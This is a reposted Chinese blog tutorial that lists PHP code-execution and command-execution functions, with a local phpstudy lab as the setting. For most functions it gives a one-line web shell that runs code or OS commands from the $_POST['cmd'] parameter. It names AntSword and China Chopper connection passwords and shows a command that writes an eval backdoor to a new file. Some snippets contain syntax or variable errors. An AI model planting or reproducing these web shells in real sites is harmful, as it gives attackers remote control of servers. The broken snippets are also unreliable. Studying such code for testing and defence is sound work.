当前位置:
  1. 首页
  2. 互联网
  3. 正文
本文介绍: 命令执行代码执行

目录

代码执行函数:

1. eval()

GET和POST传参的区别 

2. assert()

3. call_user_func()

4. create_function()

5. array_map()

6. call_user_func_array()

7. array_filter()

​编辑

8. uasort()函数

9. preg_replace()

命令执行函数:

1. system()

2. passthru()

3. exec()

4. pcntl_exec()

5. shell_exec()

6. popen()/proc_open()

7. 反引号 “

代码执行函数

前提准备:火狐插件 Quantum  Hackbar (或者hackbar)      phpstudy  

首先打开phpstudy  在phpstudy 下的www目录创建一个1.php文件接下来实验均在1.php中进行。

注意:php代码函数前加@意味着他会屏蔽出错信息,而不报错,避免通过错误回显来推测数据库结构,对其进行攻击

1. eval()

命令执行cmd=systemipconfig);
蚁剑连接密码cmd

 注意:eval要以分号结尾  传入的参数必须为php代码

<?php @eval($_POST['cmd']);?>

GET和POST传参区别 

 这里用的是POST型传参   POST型传参通过request  body 传参   而GET型传参参数包含url

 可以使用<pre>标签来使结果规范

 <?php 
 echo "<pre>";
 echo eval($_POST["cmd"]);
 echo "</pre>";
 ?>

2. assert()

 命令执行:cmd=system(whoami)
    菜刀连接密码cmd
 
<?php @assert($_POST['cmd']);?&gt;

3. call_user_func()

传入的参数作为assert函数参数
    命令执行cmd=system(whoami)
    蚁剑连接密码cmd
 
<?php call_user_func("assert",$_POST['cmd']); ?&gt;
这里assert  是被调用回调函数,其余为回调函数参数

 

<?php
call_user_func($_POST["dys"],$_POST["add"]);
?>
这里dys=assertadd=phpinfo();

4. create_function()

创建匿名函数执行代码
执行命令上传文件参考eval函数(必须加分号)。
<?php $func =create_function('',$_POST['cmd']);$func(); ?>

 第一个量表定义一个函数变量部分  第二个变量表示执行代码部分

5. array_map()

array_map() 函数
将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组回调函数接受的参数数目应该传递array_map() 函数的数组数目一致。
    
<?php
    $func=$_GET['dys'];
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    $new_array=array_map($dys,$array);
    echo $new_array;
?>

 这个函数作用是为数组每个元素应用回调函数。

6. call_user_func_array()

将传入的参数作为数组第一个传递给assert函数
    cmd=system(phpinfo();)
   
<?php
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    call_user_func_array("assert",$array);
?>

7. array_filter()

array_filter — 使用回调函数过滤数组元素

<?php
    $cmd=$_POST['cmd'];
    $array1=array($cmd);
    $func =$_GET['dys'];
    array_filter($array1,$func);
?>
命令执行:cmd=whoami  dys=system

8. uasort()函数

uasort () 函数使用用户自定义比较函数对数组排序,并保持索引关联(不为元素分配新的键)。 如果成功则返回 TRUE,否则返回 FALSE。

<?php
    uasort($_GET,'asse'.'rt');
?>

9. preg_replace()

preg_replace('正则规则','替换字符','目标字符')
执行命令上传文件参考assert函数(不需要加分号)。
将目标字符中符合正则规则的字符替换替换字符,此时如果正则规则中使用/e修饰符,则存在代码执行漏洞。
preg_replace("/test/e",$_POST["cmd"],"jutst test");

命令执行函数:

1. system()

蚁剑连接密码:cmd
<?php
echo "<pre>";
system($_POST["cmd"]);
?>

 在POST命令框输入cmd=ipconfig  即可页面出现信息

 还可以用echo写入一句话木马,来进行连接

cmd=echo “<?php @eval($_POST[‘dys’]);?>” >> dys.php

 

 

2. passthru()

passthru — 执行外部程序并且显示原始输出

蚁剑连接密码:cmd
<?php
@passthru($_POST['cmd']);
?>

 cmd=ipconfig 即可显示信息

3. exec()

这个函数有点特殊,他只输出最后一行

并且他的输出需要自己打印。(即用echo打印出来)

蚁剑连接密码:cmd
<?php
echo "<pre>"
echo exec($_POST['cmd']);
echo "</pre>"
?>

 

4. pcntl_exec()

pcntl_exec — 在当前进程空间执行指定程序

pcntl_exec(string $path, array $args = [], array $env_vars = []): bool给定参数执行程序

path

path 必须时可执行二进制文件路径一个文件第一行指定了 一个可执行文件路径标头的脚本比如文件第一行是 #!/usr/local/bin/perlperl 脚本)。 更多的信息查看系统execve(2)手册

args

args 是一个传递给程序的参数的字符串数组

env_vars

env_vars 是一个传递给程序作为环境变量字符串数组这个数组是 key => value 格式的,key 代表传递环境变量名称value 代表环境变量值。

5. shell_exec()

shell_exec — 通过 shell 执行命令并将完整输出字符串方式返回

蚁剑连接密码:cmd
<?php
echo "shell_exec($_POST['cmd'])";
?>

 

6. popen()/proc_open()

该函数也可以字符串当作OS命令来执行,但是该函数返回的是文件指针而非命令执行结果。该函数有两个参数。

<?php
$cmd=$_POST['cmd'].">>1.txt";  
popen("$cmd",'r');
?>
$cmd将文件查询结果放入1.txt  popen将该文件赋予可读权限linux里,命令为
popen("/bin/ls",'r');

 

 

7. 反引号

[“]反引号里的东西也会被当成系统命令执行

whoami可以直接执行

<?php
echo `whoami`
?>

<?php
echo "<pre>";
$cmd=$_GET["cmd"];
echo `$cmd`;
echo "</pre>";
?>

原文地址:https://blog.csdn.net/qq_45945842/article/details/131340759

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_31728.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

上一篇 详解如何利用PHP实现RPC
下一篇 Ubuntu使用netplan配置网络

相关文章

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

插入图片
浏览器会保存昵称、邮箱和网站cookies信息,下次评论时使用。